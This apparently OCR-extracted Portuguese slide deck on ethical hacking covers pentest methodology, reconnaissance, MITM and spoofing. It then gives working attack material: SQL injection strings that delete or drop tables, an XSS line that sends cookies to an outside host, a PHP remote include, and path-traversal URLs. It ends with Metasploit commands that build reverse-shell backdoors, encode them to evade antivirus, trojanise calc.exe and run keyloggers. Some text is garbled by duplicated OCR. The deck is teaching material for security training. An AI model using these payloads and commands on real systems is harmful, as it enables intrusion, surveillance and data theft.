ethical hacking slide completo

Ethical Hacking

Marcos Flávio Araújo AssunçãoCertified Ethical Hacker mflavio@defhack.comwww.defhack.com.br

Apresentação do palestrante

Marcos Flávio Araújo Assunção

FormaçãoFormação

Mestrando em Sistemas de Informação, Mestrando em Sistemas de Informação, Universidade Fumec.Universidade Fumec.

Especialista em Docência para o Ensino Especialista em Docência para o Ensino Técnico Superior, Senac Minas.Técnico Superior, Senac Minas.

Especialista em Redes de Computadores, Especialista em Redes de Computadores, ESAB. Vitória, ES. ESAB. Vitória, ES.

Tecnólogo em Engenharia de Software, Tecnólogo em Engenharia de Software, UNATEC. Belo Horizonte, MG.UNATEC. Belo Horizonte, MG.

Atuação profissionalAtuação profissional

Professor do Senac Minas e do Centro Universitário UNAProfessor do Senac Minas e do Centro Universitário UNA

Fundador da empresa DefHack Tecnologia Fundador da empresa DefHack Tecnologia ((www.defhack.com.brwww.defhack.com.br).).

Palestrante e Keynote em seminários sobre Ethical HackingPalestrante e Keynote em seminários sobre Ethical Hacking

Certified Ethical Hacker pelo EC-COUNCILCertified Ethical Hacker pelo EC-COUNCIL

Autor de 9 livros sobre Hacking e SegurançaAutor de 9 livros sobre Hacking e Segurança

PublicaçõesPublicaçõesGuia do Hacker

Brasileiro

Desafio Linux Hacker

Segredos do Hacker Ético 1ª ,2ª, 3ª, 4ª e 5ª Edições

Honeypots e Honeynets

Wireless Hacking

PublicaçõesPublicações

Treinamentos em Ethical Hacking – Desde 1999Treinamentos em Ethical Hacking – Desde 1999

Keynote em eventos de Ethical Hacking – Lisboa 2006Keynote em eventos de Ethical Hacking – Lisboa 2006

Keynote em eventos de Ethical Hacking – Lisboa 2008Keynote em eventos de Ethical Hacking – Lisboa 2008

Keynote em eventos de Ethical Hacking – Maputo 2014Keynote em eventos de Ethical Hacking – Maputo 2014

CertificaçõesCertificações

Certified Ethical Hacker

Cisco Certified CCNA Instructor Trainer

Citações ProfissionaisCitações Profissionais( 2003 )( 2003 ) EUA. EUA. The New York TimesThe New York Times, , “Brazil Becomes a “Brazil Becomes a

cybercrime labcybercrime lab”. Por Tony Smith”. Por Tony Smith

( 2007 )( 2007 ) Portugal. Portugal. GQ PortugalGQ Portugal, , “Hacker Ético”,“Hacker Ético”, por Miguel dos por Miguel dos SantosSantos

( 2008)( 2008) Reino Unido. Reino Unido. McMafiaMcMafia, , “Code Orange”,“Code Orange”, Por Misha Por Misha GlennyGlenny

Valhala HoneypotValhala Honeypot

-Detecção de Intrusos

- Pote de mel

-Grátis

- Totalmente em português

- Mais de 30 mil usuários

ProjetosProjetos

www.superdownloads.com.brwww.superdownloads.com.br

Segurança? Isso existe?

Conheces teu inimigo e conhece-te a ti mesmo; se tiveres cem combates a travar, cem vezes serás vitorioso – Sun Tzu

Por que não estamos seguros?

Configurações malfeitas

Softwares com falhas Redes desprotegidas Proteções ineficazes Falta de atualizações Fator humano

Vulnerabilidade

62milsenhas-lulzsec

220 sites fora hackeados - jusbrasil

Segurança por obscuridade

Segurança Passiva- Semi-automática- Desatualizada- Pouco eficiente

Segurança Ativa- Manual- Bastante atualizada- Alta eficiência

Por que usar senhas complexas?

Tipos de “Hackers”

Black Hat (Cracker)

White Hat (Ethical Hacker)

Gray Hat (indeciso)

Crackers famosos

• Década de 80

• Invadiram Security Pacific Bank e Alamos National Laboratory

• Primeiro caso famoso na mídia

• Contribuiu para aprovação de leis contra hacking

John Draper

• Década de 70

• Captain Crunch

• Apito

• Phreaking

•Recentemente:- Empresário - Firewall CrunchBox

Robert Morris Jr.

• Ano de 1988

• Primeiro Worm

• MIT

• Derrubou 6 mil computadores

• Recentemente:- Empresário- ViaWeb (Yahoo Store)- Y Combinator

Kevin Poulsen

• Década de 80

• KIIS-FM e o Porsche 944

• 51 meses de prisão

• Recentemente: - Jornalista - SecurityFocus

Kevin Mitnick

• Década de 90

• Invadiu Sun, Nokia, Motorola e outras

• Free Kevin

• Takedown

• Atualmente:- Empresário e autor- Defensive Thinking- A arte de enganar

Adrian Lamo

• Década de 2000

• Invadiu NYT, Microsoft e outros

• Capturado em 2003 e julgado em 2004

• Libertado em 2006

• Recentemente- Analista freelancer- “Can you hack it”

Adrian, Mitnick e Poulsen

• Foram presos

• Se tornaram famosos

• Trabalham atualmente com segurança

• São minoria

O Hacker Ético é uma necessidade do mercado ou apenas uma “frescura” adolescente?

MCT convida movimento Hacker

brasilgovMarcos Flávio Araújo Assunção

Precisa-se de Hackers experientes

estadominas-onlineMarcos Flávio Araújo Assunção

Governo americano recruta hackers

globodigitalMarcos Flávio Araújo Assunção

Hacker Ético, um aliado na segurança.

hojeemdia

Hacker Ético na mira das empresas

infoexameMarcos Flávio Araújo Assunção

Cresce a busca pelo Hacker Ético

jornal-o-globoMarcos Flávio Araújo Assunção

Hackers tem o apoio oficial do MCT

olhardigital

Governo federal contratará Hackers

profissionaistiMarcos Flávio Araújo Assunção

Forbes – Hacker Ético é uma das principais carreiras do futuro

O papel do Hacker Ético – O que é um Penetration Test?

Você usaria um produto que nunca foi testado na prática?

capacete-destruído

Teste de “stress” – Uma necessidade real

capacete-moto

Teste de “stress” - Pressão

capacete

Teste de “stress” - Temperatura

flame-test-helmet

Penetration Test (Teste de Invasão) Consiste em utilizar

técnicas de Hackers em testes de stress da segurança de redes e sistemas

É a principal ferramenta de um Hacker Ético

Abordado pelo CEH (Certified Ethical Hacking)

“Invadir para proteger”

Certificação de Hackers Éticos

eccouncil

Níveis de um Pentester / Ethical Hacker

Nível 1 – Júnior – Tool based Penetration Tester:Esse profissional é aquele que somente conhece as ferramentas básicas parao pentest, não sendo capaz de desenvolver suas próprias técnicas e ferramentas.Muitas vezes aprenderam as técnicas em treinamentos específicos. É neste nível que são “graduados” os profissionais CEH (Certified Ethical Hackers)

Nível 2 – Pleno – Coding based Penetration Tester:Esse profissional é aquele que desenvolve suas próprias ferramentas e scripts para a realização dos penetration tests, mas ainda utiliza muitos recursos já “prontos” (como o Metasploit) para acelerar o processo de teste das vulnerabilidades. Necessita de conhecimentos pelo menos em algoritmos e linguagens básicas de programação.

Nível 3 – Sênior – Vulnerability Researcher:Ao invés de realizarem PenTests, muitos hackers éticos com conhecimento mais avançado preferem debugar o funcionamento de softwares e protocolos em busca de falhas do tipo 0-day, e muitos são contratados por empresas com essa finalidade. O Google por exemplo costuma dar prêmios a quem descobre falhas no Chrome.

Tipos de Penetration Test

Black Box

White Box

Gray Box

Black Box

Teste realizado em um sistema remoto, sem nenhum conhecimento do alvo. O invasor deve partir da estaca zero, sem informações sobre endereços IPs públicos, sistemas operacionais utilizados, tipos de roteadores e firewalls, etc. Esse teste visa demonstrar a visão de um atacante de fora da intranet da empresa.

Gray Box

Teste realizado entre departamentos ou sub-redes de uma intranet, com conhecimento parcial da estrutura. O objetivo desse teste é demonstrar até que ponto um funcionário consegue chegar caso ele decida tentar acessar um sistema de outro departamento ao qual ele não tem acesso legítimo. Nesse tipo de PenTest, temos conhecimento parcial da rede, como a faixa de endereços IPs utilizada na sub-rede de origem, o endereço IP do gateway e do servidor DNS, etc.

White Box

Teste realizado em uma intranet local, com total conhecimento do alvo. Nesse teste, temos o conhecimento total de como a rede opera, sabemos todos os dispositivos, endereços e sistemas operacionais utilizados. A visão de um teste White Box é a de um administrador de rede. Essa metodologia de testagem é utilizada quando desejamos conhecer até onde um administrador poderá ir caso deseje acessar dados ou obter informações, tais como conversar de MSN, senhas de usuários, e-mails alheios, etc.

Quando se utilizar de um PenTest?

“Quebrar” ao invés de “rastrear”

PenTest x Perícia Forense

Caso : HD do Daniel Dantas

Metodologias de Penetration Test

O que é uma metodologia de PenTest?

Por que devemos seguir uma metodologia?

Vantagens e desvantagens

OSSTMM○ http://www.isecom.org/osstmm/

ISSAF○ http://www.oissg.org/issaf

OSSTMM Metodologia mais popular Os testes são discutidos em um alto nível Inclui tecnologias únicas (RFID,

infravermelho) Não se baseia fortemente em ferramentas BackTrack se baseia nessa metodologia

OSSTMM (Open Source Security Testing Methodology Manual)

OSSTMM Vantagens

Maior flexibilidade para PenTestersAtualizações frequentes

DesvantagensMaior curva de aprendizado

• Conhecimento de ferramentas e Sistemas Operacionais necessários como pré-requisito

Versões mais novas requerem pagamento

OSSTMM

ISSAF (Information Systems Security Assessment Framework)

Contém dois documentos separados Gerenciamento (ISSAF0.2.1A) Penetration Testing (ISSAF0.2.1B)

Checklists para Auditoria / Proteção de Sistemas

Centrado em ferramentasMarcos Flávio Araújo Assunção

Vantagens○ Não exige conhecimento prévio de ferramentas e

sistemas operacionais○ Fornece exemplo do uso de ferramentas de

PenTest

Desvantagens○ Rapidamente desatualizado○ Exemplos de ferramentas de PenTest não são

extensivos

O ISSAF é constituído de 5 fases: Fase I – Planejamento Fase II – Análise Fase III – Tratamento Fase IV – Resultados Fase V – Manutenção

Fases do ISSAF

Fases de um Penetration Test

Fases de um PenTest (Ataque)

Vulnerabilidades

Categorias

Configuração Redes Dispositivos

móveis Software Malware Físicas Humanas

Tipo• Cliente • Servidor

Atuação• Local• Remota

Meio• Informática• Telefone / outros

Etapas técnicas de um PenTest

FootPrinting

Pesquisa inicial (FootPrinting)

Pesquisa geral Ping e traceroute Sites de emprego Whois (internic e

arin) DNS Zone

Transfer Google Archive.Org Mail Tracking

Ping e traceroute

Permitem descobrir informações como:

- IP e nome de servidores e roteadores intermediários

- Se há bloqueio de firewalls filtro de pacote

Pesquisando sites de emprego

Vagas de emprego frequentemente revelam mais do que deveriam sobre a estrutura de TI de uma empresa

Whois – Pesquisando domínios

Permite descobrir informações sobre um domínio

Vários sites podem ser usados. Exemplo: registro.br e internic.net

Whois – Pesquisando IPs

ARIN.NET Permite descobrir

o range de endereços IP de uma rede pública

DNS Zone Transfer Transfere zonas de

servidores DNS secundários vulneráveis

Pode usar o dig ou o nslookup

Exemplo (nslookup):

server ns2.empresa.comset type=ANYls –d empresa.com

Google Hacking Descobrir informações pelo google usando

comandos como site, filetype, inurl e index of, entre outros.

Archive.Org – WayBack Machine

Permite visualizar versões passadas de qualquer website já criado desde o surgimento da WEB.

Extremamente útil para ver a evolução de uma empresa

Mostra o “ano” de quando o site foi criado. Isso é muito relevante pois podemos saber quando a empresa começou a atuar.

Outra vantagem: poder “rever” o conteúdo de um site que já saiu do ar.

Archive.Org – WayBack Machine

Mail Tracking

Mail Tracking é um serviço extremamente útil, que permite monitorar os e-mails que você envia para saber se o destinatário leu a mensagem, o horário que isto aconteceu – e o mais importante – o endereço IP do sistema que destinatário estava utilizando no momento.

Mail TrackingBasta se cadastrar no site e mandar o seu e-mail com “mailtracking.com” no final da mensagem. Exemplo: fulano@empresa.com.br.mailtracking.com .

Assim que o destinatário abrir a mensagem, logue no mailtracking e veja os dados capturados:

Varredura e Enumeração

Etapas da Varredura

Varredura de hosts (endereços IP) na rede

Varredura de portas (serviços ativos)

Varredura de IPs

Tem como objetivo descobrir as máquinas ativas da rede

Ping Sweep UDP Scan Softwares: ping,

hping3, nmap (-sV), superscan, etc.

Varredura de portas

Tem como objetivo identificar os serviços ativos no sistema

Softwares usados: NMAP, Superscan, etc.

Tipos de varredura: Full, Half-Syn, FIN, ACK, XMAS, NULL, UDP, etc.

Enumeração

Tem como objetivo identificar os serviços rodando nas portas e o sistema operacional do alvo

Captura de banners

Fingerprint Sessão Nula (old!) Regras de Firewall

Captura de Banners

Basta se conectar ao serviço usando telnet

Muitos serviços não são configurados para alterar o banner padrão

Mostra o nome e a versão do software

Informação pouco confiável

Fingerprint

Usa um banco de dados de “impressões digitais” para identificar o serviço

Baseia-se na análise do comportamento de pacotes

Fingerprint com o NMAP

Sistema Operacional: (opção –O))

Serviços das portas: (opção –A))

Vulnerabilidades de Senhas

Autenticação por senhas Senhas fracas Bloqueio por tentativas “Tentativa e erro” Força-Bruta local

(eficiente) Força-Bruta remota

(não tão eficiente) Wordlists (dicionários) Rainbow Tables

Força-Bruta remota - xHydra

Muito usado em sistemas Linux.

Permite força-bruta em diversos protocolos de aplicação: HTTP, FTP, SQL, VNC e muito mais.

Entretanto, somente trabalha com wordlists.

Força-Bruta remota - Brutus

Para sistemas Windows

Mais limitado e com suporte a menos protocolos que o XHydra

Entretanto, trabalha com “bruteforce real” ao invés de somente wordlists

Força-Bruta local - Cain

Para sistemas Windows

Permite tentar descobrir localmente diversos tipos de hash

Tem suporte a, entre outros:LM, NTLM, MD5, SHA-1, WPA1, etc.

Força-Bruta local - Cain

Rainbow Tables

São “tabelas” que podem ser geradas ou baixadas da Internet

Visam “acelerar” o processo de força-bruta local ao pesquisar hashes já descobertos

O WINRTGEN permite gerar suas próprias RTs

Rainbow Tables Online

Muitos sites oferecem o serviço de rainbow tables online

Isso permite que você quebre diversos tipos de hash em questão de segundos

Sites: Online Hash Crack e CrackStation, entre outros.

Vulnerabilidades de Rede

Vulnerabilidades de rede

Podemos dizer que as vulnerabilidades de rede mais comuns são:

Farejamento (sniffing)Redirecionamento de tráfegoSpoofingHijackingMan in the middle

Farejamento de tráfego

Sniffers Modo

promíscuo Dados sem

criptografia Passivo Capturando

senhas Limitado

Redirecionamento de tráfego Sniffing ativo Farejar tráfego

de outros dispositivos

Redirecionar o tráfego para o ponto desejado

ARP Poisoning ICMP redirect DHCP Spoofing Port Stealing

Arp Poisoning

VLANsAddress ResolutionProtocol (ARP)Cache ARPDinâmico x EstáticoPort Security não protege contra isto.

ICMP Redirect

Outro métodointeressanteICMP Type 5Redirect“Sou a melhor rota”Bom para redirecionar tráfego de roteadores

DHCP Spoofing

Spoof = falsoServidor DHCPAtribui endereços antes do verdadeiro servidorCondição de corrida

Port Stealing

Nível de enlacePortas do SwitchEthernet framesSpoofing/Poisoning

Permite capturar o tráfego de VLANs mal configuradas ao se passar por um tronco (802.1d trunk)

Man in The MiddleColocando-se no meio da

transação

Man in the Middle

No “meio” da transmissão

Sessão dupla Local (ARP) Remoto (Proxy) Tráfego

criptografado

MITM – Lado Cliente

Ponta ClienteInicia a conexãoResponsável por dados de autenticação, como senhas e cookies de sessãoAutenticação alterada “on the fly”

MITM – Lado Servidor

Ponta servidorResponde às solicitações da conexão clienteDiz se o cliente está autenticado ou nãoManipulação de html“Entre novamente com a senha”

Como é possível o MITM?

Interceptação do certificado “real” do servidor verdadeiroChavesCertificado Digital “falso” enviado ao clienteConexão dupla criptografada O browser reclama, mas não impede na maioria dos casosOs avisos do browser podem ser removidos por outras técnicas

Alguns protocolos suportados pelo MITM

Secure Socket Layer (SSL)Secure Shell (SSHv1)Remote Desktop Protocol (RDP)

Softwares de rede local para MITM

Plataforma: WindowsRedirecionamentoarp poisoningO mais simples de se utilizarMITM de RDPMITM de DNS Gera os certificados automaticamente

DSniff

Plataforma: LinuxRedirecionamento : Arp poisoningarpspoofmacofwebmitmsslmitm

EttercapPlataforma: Linux e WindowsRedirecionamento : Arp Poisoning, Port Stealing, ICMP Redirect e DHCP SpoofingPode sequestrar a sessãoPossui diversos plug-ins

SSL Strip

Apresentado na BlackHat de 2009 pelo criador do SSLSniff Utiliza novas técnicas de hijacking para capturar novas sessõeshttp/httpsNão depende de aguardar redirect 301/302 Mais eficiente que o ettercap e o Cain

SSL Strip

Passos necessários para o SSL Strip funcionar:

- IP Forward- Port redirect- ARP spoofing (poisoning)

Softwares Proxy para MITM

Achilles

Plataforma: WindowsProof of conceptLentoMuitos errosNão separa os dados nas conexõesPermite alteração limitada “on the fly”

Achilles

Senha capturada por MITM de uma conexão HTTPS. Note que a janela é dos dados provenientes do lado cliente.

Paros Proxy

Plataforma: Java Virtual MachineMuitos recursosMais rápidoSepara os dados em diversas “pastas”Permite filtro para alteração “on the fly”- Ex: “senha”

Spoofing e Hijacking

Spoofing

Informações falsas Autenticação Cliente não precisa

estar online ARP Spoofing DNS Spoofing IP Spoofing MAC Spoofing

Tipos de IP Spoofing

Blind IP Spoofing

É o spoof “cego”. Acontece quando você envia o pacote com o IP de origem falsificado, mas como o destino está em outra rede você não consegue farejar e ver a resposta.:

Non-Blind IP Spoofing

Neste caso, você está na mesma LAN (e na mesma VLAN) da máquina de destino a qual você mandou o pacote spoofado. Então, farejando o trafégo com o wireshark ou outro sniffer você consegue visualiazr a “resposta”.

Non-Blind IP Spoofing com STERM:

DNS Spoofing

É um dos tipos mais perigosos

Permite enviar respostas “falsas” de consultas DNS a um cliente.

Pode ser facilmente realizado pelo Cain ou Ettercap se há redirecionamento de tráfego

DNS Spoofing com CAIN

Hijacking

Sequestro de sessões

Números de sequência

Necessita do cliente online

Ack Storm Retransmissão

Hijacking

Usando firesheep para capturar cookies http e sequestrar sessões

Vulnerabilidades de Servidores e Aplicações

Enganos de Segurança

O Firewall protege meu servidor web e meu banco de dados Acesso à porta 80 e 443 do seu servidor Web

faz parte do seu perímetro de defesa externo Vulnerabilidades no servidor Web ou em

aplicações web podem levar à um acesso interno da rede… passando pelo firewall.

Enganos de Segurança (cont.)

O IDS protege meu servidor Web e meu banco de dados O IDS é configurado para detectar assinaturas

de ataques bem conhecidos Essas assinaturas não incluem as feitas contra

aplicações customizadas

Enganos de Segurança (cont.)

SSL protege meu site SSL protege o transporte de dados entre o

servidor web e o browser do usuário SSL não protege contra ataques destinados ao

cliente ou à aplicação SSL é o melhor amigo dos hackers devido ao

falso senso de segurança (vide ataques de MITM)

Falhas clássicas em Servidores Web

Buffer Overflow

Exploração de falhas muito utilizada ainda hoje Dados de entrada > buffer (- tratamento) IIS Apache Shell remoto ou outro payload Acesso à rede interna Também acontece com aplicações web

Injeção de comandos em Hexa

Codificando em hexa as strings das URLs, pode ser possível burlar filtros de segurança e IDS.

http://www.site.com/cgi?arquivo=/etc/passwd

Pode ficar assim:

http://www.site.com/cgi?arquivo=/%2F%65%74%63%2F%70%61%73%73%77%64

Codificação dupla em hexa

Primeira:

scripts/..%255c../winnt

se torna:

(%25 = caractere “%”)

Segunda:

se torna:

scripts/..\../winnt

Travessia de diretórios agora é possível utilizando codificação dupla em hexa.

Barra em Unicode

Em unicode, “%c0%af”, é o equivalente à barra (“/”). Então, um exploração ficaria:

scripts/..%c0%af../winntE seria convertido para:

scripts/../../winnt

Travessia de diretórios também é possível usando ofuscação através do Unicode

Falhas em Aplicações Web

Entrada maliciosa - Injection

Problema muito comum

Filtro malfeito Lado servidor SQL Injection

‘’ or’=‘

‘ 1 = 1 --

Saída maliciosa - XSS

Mesmo princípio do injection

Tipo cliente Utilizado

normalmente para captura de cookies

Problemas comuns

Algoritmo fraco – Muitos sites web hoje estão usando algoritmos lineares baseados em variáveis previsíveis, como tempo ou endereço IP.

Sem bloqueio de conta – Pode ser feito ataques de força-bruta na ID de sessão sem que o servidor web reclame.

Expiração indefinida – Se a sessão não expira facilmente, o invasor tem tempo quase ilimitado para

tentar descobrir o ID.

IDs em Campos Ocultos

Cross Site Scripting (XSS)

Atacante injeta scripts (JavaScript) no browser

O código é executado pelo browser para realizar alguma ação

Muito usado para roubar cookiesFunciona geralmente no lado cliente

Cross-Site Request Forgeries (CSRF)

Evolução do Cross Site ScriptingUsar POST em vez de GETForçar o uso de forms próprios via

TOKEN aleatórioMais difícil de impedir que XSS

[img]http://seuforum.com/novaresposta.php?action=newthread&subject=teste&body=alguma+coisa+aqui&submit=go[/img]

CRLF Injection Carrier Return and Line Feed (CRLF) Caracteres especiais que representam o “fim da

linha” (end of line – EOL) O servidor “verdadeiro” gera o código HTML, o que

torna o ataque perigoso. Exemplo:http://www.seusite.com.br/somepage.php?page=%0d%0aContent-

Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a%3Chtml%3EConteúdo Hacker%3C/html%3E

O usuário verá uma página com os dizeres “Conteúdo Hacker” escrito na mesma.

Explorando Filtros malfeitos

PHP Injection Includes mal configurados permitem que outro script

remoto seja executado Isso permite que você execute programas no sistema,

obtenha arquivos, etc.

include "$file.inc"; //include “http://attack.com/script.inc";

script.php?file=http://site.com/script

system("ls $cmd"); //system("ls -la | wall bom dia");

script.php?cmd=-la | wall bom dia

Exemplos de XSS

location.href=“http://www.site.com/captura.cfm?c=“ + document.cookie</script>

SQL Injection

SQL Injection é um ataque de injeção de comandos causado por uma entrada de dados não validada corretamente

O atacante inclui uma entrada maliciosa com a intenção de alterar a consulta ao banco de dados realizada

Funciona apenas no lado servidor

Métodos do SQL InjectionO SQL Injection pode ser utilizado com dois

métodos do HTTP:

GET – Nesse método a inserção dos comandos SQL é realizada diretamente na URL do site. Exemplo: GET /usuarios.asp?sobrenome=assuncao’;DELETE

FROM users WHERE 1=‘1 HTTP/1.1

POST – Nesse método a inserção dos comandos SQL é

feita nos campos de um formulário. Exemplo: ‘’ OR ‘=‘

Tipos de SQL InjectionExistem dois tipos básicos de SQL Injection

Error Based SQL Injection – O atacante detecta que o website é vulnerável devido a erros de SQL mostrados na tela, usando-os também para guiar o ataque.

Blind SQL Injection – O site é vulnerável a SQL Injection mas não apresenta nenhum tipo de erro ao atacante, o que torna mais difícil de detectar a falha.

Error Based SQL Injection (POST)

SQL Injection: Exemplo normal 1

GET /view_account.cfm?acct_id=10 HTTP/1.1

SELECT * FROM accounts WHERE acct_id = 10

SQL Injection : Exemplo injeção 1

GET /view_account.cfm?acct_id=10 OR 1=1 HTTP/1.1

SELECT *

FROM accounts

WHERE acct_id = 28 OR 1=1 --

SQL Injection: Exemplo normal 2

GET /user_lookup.cfm?lastname=assuncao HTTP/1.1

SELECT * FROM users WHERE lastname = ‘assuncao’

SQL Injection: Exemplo injeção 2

GET /user_lookup.cfm?lastname=assuncao ’;DELETE FROM users WHERE 1=‘1 HTTP/1.1

SELECT * FROM users WHERE lastname = ‘assuncao’;DELETE FROM

users WHERE 1=‘1’

SQL Injection - Dicas

acct_id=10 OR 1 = ‘1’ Tente várias cláusulas OR usando <>, >, >=, LIKE, etc. Use comandos para acabar prematuramente com uma

consulta SELECT * FROM users WHERE user_id = 1-- AND

password=‘minhasenha’

Enumerar informação do banco de dados acct_id=10 UNION SELECT name [,1,2,…] FROM objetos

WHERE xtype=‘U’ acct_id=10 UNION SELECT [colunas] FROM [tabela]

UNION requer que ambos os pedidos compartilhem um número comum de colunas, acrescentando colunas quando requerido

SQL Injection – Automatização Alguns softwares de vulnerabilidade permitem detectar

erros de SQL automaticamente. Alguns exemplos: Nessus SQLFinder Acunetix WVS

Existem até alguns programas que podem explorar automaticamente o SQL Injection, automatizando o processo. Exemplos: Havij SQL Ninja Fast-Track Metasploit

Exemplo: Havij (SQL Injection GET)

Exemplo: Havij (Online Crack MD5)

SQL Injection: Indo além

Concatene múltiplos comandos acct_id=28; DROP TABLE Users;

Procedimentos úteis xp_msver xp_cmdshell [command] -> PERIGO!PERIGO! xp_servicecontrol [action] [service]

Exemplo xp_cmdshell

Considerações sobre o SQL Server

O SQL Server vem por padrão com o usuário ‘sa’ (system administrator).

Muitos administradores não colocam senhas muito complexas para este usuário

O BackTrack possui várias ferramentas para tentar fazer força bruta na conta sa e, caso a senha seja descoberta, pode-se executar o xp_cmdshell sem precisar de SQL Injection.

Vulnerabilidades de Software – Exploração de falhas

Objetivos da exploração de falhas

Falhas remotas – Ganhar acesso não autorizado ao sistema alvo (normalmente ao shell) ou causar Denial of Service

Falhas locais – Elevar os privilégios de acesso para root/system ou causar Denial of Service

Normalmente um atacante irá explorar uma falha remota para invadir um sistema e loco depois tentará a elevação de privilégios. O motivo para isto é que a maioria dos serviços hoje rodam no perfil de usuários com poucos privilégios como o nobody/guest.

Tipos de falhas Stack

overflow Heap

Spraying Memory

Corruption String format Race

conditions Privilege

Escalation

Pesquisa manual por Falhas - SecurityFocus

Scanners “genéricos” de vulnerabilidades

Não se focam em um serviço específico.

São como um médico generalista, detectam “superficialmente” problemas em vários protocolos.

Exemplos de softwares: Nessus, Retina, Languard, Shadow Security Scanner

Boa opção para uma grande rede corporativa

Scanners “especialistas” de vulnerabilidades

Focam em poucos protocolos e serviços (normalmente apenas um), por isso fazem uma análise mais apurada.

Há muitos scanners destes para http, sql, etc.

Exemplos de softwares: Nikto, SQLMap, SQL Ninja, Acunetix, W3AF, etc.

Descobrindo novas falhas – Zero Day Debugger /

dissambler Fuzzing Registradores ESP (Stack

Pointer) EBP (Base

ponter) EIP (Instruction

pointer) Breakpoints NOP Slide Payload Exploit

Metasploit Framework

• Criado por HD Moore, é hoje o framework de exploração de falhas mais utilizado.

• Extremamente customizável• Atualizações frequentes• Possibilidade de criação de scripts• Muitas opções de payloads• Métodos para se burlar firewalls e anti-vírus• Meterpreter• Interface console, gui e web

MetaSploit Framework

•Framework de testes

• Objetivo

• Metodologia blackbox

• Explora Bugs através de exploits

Ex: Buffer Overflows

Metasploit Framework

Selecionar exploit

Selecionar alvo

Selecionar Payload

Aguardar resultado

Acessar shell remoto

Metasploit – Suíte completa

O Metasploit Framework (MSF) vem com muitos utilitários para auxiliar na realização da exploração. Vamos estudar os principais: msfconsole, msfcli, msfpayload e msfencode.

Variáveis do Metasploit

São usadas em todos os comandos do MSF. Ex: msfconsole, msfcli, msfpayload, etc. As principais são:

• LHOST -> IP local• LPORT -> Porta local• RHOST -> IP remoto• PAYLOAD -> Tipo de payload• TARGET -> Tipo de alvo

Msfconsole

Método mais utilizado para uso do MSF. É um console que permite escolher interativamente exploits, utilitários, payloads e configurar as devidas variáveis.

Comandos do MSFCONSOLE

• search <nome> -> Pesquisa módulo de exploit• use <nome> -> Utiliza módulo de exploit• show <argumento> -> Mostra informações referentes ao módulo. O argumento pode ser: exploits, options, payloads ou auxiliares.• set <variável> -> Configura um valor em uma variável. Ex: LHOST, LPORT, PAYLOAD, etc.• unset <variável> -> “Desconfigura” uma variável.• exploit -> Realiza a exploração após as variáveis terem sido configuradas.

MSFConsole – Exemplo search

search ms12

MSFConsole – Exemplo use

use exploit/windows/smb/ms08_06_netapi

MSFConsole – Exemplo show

show payloads

MSFConsole – Exemplo set

set LHOST 192.168.10.1set LPORT 443set RHOST 192.168.10.2

MSFConsole – set payload e show options

set PAYLOAD windows/meterpreter/reverse_tcpshow options

MSFConsole - Exploit

Depois de todas as variáveis já devidamente configuradas para executar o comando exploit para realizar a exploração

Meterpreter

MeterpreterO MSF trabalha com vários tipos de payloads, mas o melhor de todos é o meterpreter. Algumas características dele:

• Roda diretamente na memória RAM, sem uso do disco.• Permite a execução de diversas tarefas como (shell, download e upload de arquivos, keylogger, sniffer, screenshot, RDP, etc).• Permite migrar o processo para outro executável e inicializar com o sistema• Permite limpar os rastros nos logs e finalizar anti-vírus• Permite elevar os privilégios de usuário

Alguns comandos do Meterpreter

• ps -> Lista processos em execução• shell -> Acessa o prompt de comandos• clearev -> Limpa os logs.• run vnc -> Instala o VNC remotamente.• getsystem -> Obtém o usuário system.• keyscan_start -> Inicia o keylogger.• migrate -> Migra para outro processo.• run migrate -> Migra automaticamente• screenshot -> Tira um screenshot da tela• download -> Faz download de um arquivo

Meterpreter – Exemplo ps

Meterpreter – Exemplo migrate

Meterpreter – Exemplos pwd e ls

pwd -> Mostra diretório atualls -> Lista arquivos/diretórios

Meterpreter – Download e Upload

Sintaxe:

download <arquivo> <local>upload <arquivo> <local>

Meterpreter – Listando Tokens

Meterpreter Ex: getsystem, clearev e screenshot

Meterpreter keyscan_start e sniffer_start

Observação: keyscan_stop e sniffer_stop encerram as atividades. keyscan_dump obtém o arquivo com

as teclas digitadas.Marcos Flávio Araújo Assunção

Meterpreter – Exemplo shell

Msfcli

O msfcli permite fazer tudo o que o msfconsole faz mas diretamente do shell, em uma única linha de comando. É muito prático quando usado em scripts.

Sintaxe:

msfcli <módulo> <payload> <variáveis> <modo>

Em modo normalmente utilizando a opção E para permitir a execução imediata do exploit.

Msfcli – Exemplo real

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.10.2 LHOST=192.168.10.1 LPORT=443 E

No exemplo acima estamos executando o msfcli contra o host remoto (RHOST) 192.168.10.2 configurando como PAYLOAD o meterpreter de conexão reversa e dizendo que ele deve se conectar de volta no ip 192.168.10.1 (LHOST) na porta 443 (LPORT).

Msfpayload

MsfpayloadPermite converter qualquer um dos payloads do metasploit para um arquivo puro(raw) ou mesmo um executável. Isso permite que você possa utilizar o payload como um backdoor comum.

Sintaxe:

msfpayload <payload> <variáveis> <modo>

Em modo normalmente utilizando a opção X para permitir que o payload executável seja criado.

Msfpayload

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.1 LPORT=443 X > backdoor.exe

No exemplo acima estamos gerando o executável backdoor.exe ao rodar o msfpayload como PAYLOAD do meterpreter de conexão reversa e dizendo que ele deve se conectar de volta no ip 192.168.10.1 (LHOST) na porta 443 (LPORT).

Se for um payload de conexão reversa é necessário um Multi-Handler no MSFConsole ou MSFCli para receber a conexão de volta. No próximo slide veremos como criar um.

Multi-Handler: Msfconsole x Msfcli

Msfencode

MsfencodePermite codificar qualquer um dos payloads em arquivo puro(raw) gerados pelo msfpayload. O objetivo é fazer com que assim o payload não seja detectado por anti-vírus e ferramentas de IDS. Sintaxe:

msfencode –i <arq> -e <encoder> -c <vezes> -t <modo> -o <arq>

Opções mais comuns:

-i -> arquivo de entrada-e -> tipo de encoder. Ex: x86/shikata_ga_nai-c -> vezes que o encoder irá codificar.-t -> tipo de arquivo gerado. Normalmente é exe.-o -> arquivo de saída-x -> executável para ser usado como base-k -> Permite execução paralela (usado com o –x).Marcos Flávio Araújo Assunção

Msfencode – Uso com arquivo raw

msfencode -t exe –i backdoor.raw -o backdoor.exe -e x86/shikata_ga_nai -c 5

Msfpayload + Msfencode (única linha)

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.10.1 LPORT=443 R > msfencode –x calc.exe -k -o calcmalvada.exe -e x86/shikata_ga_nai -c 7 –t exe

Fast-Track

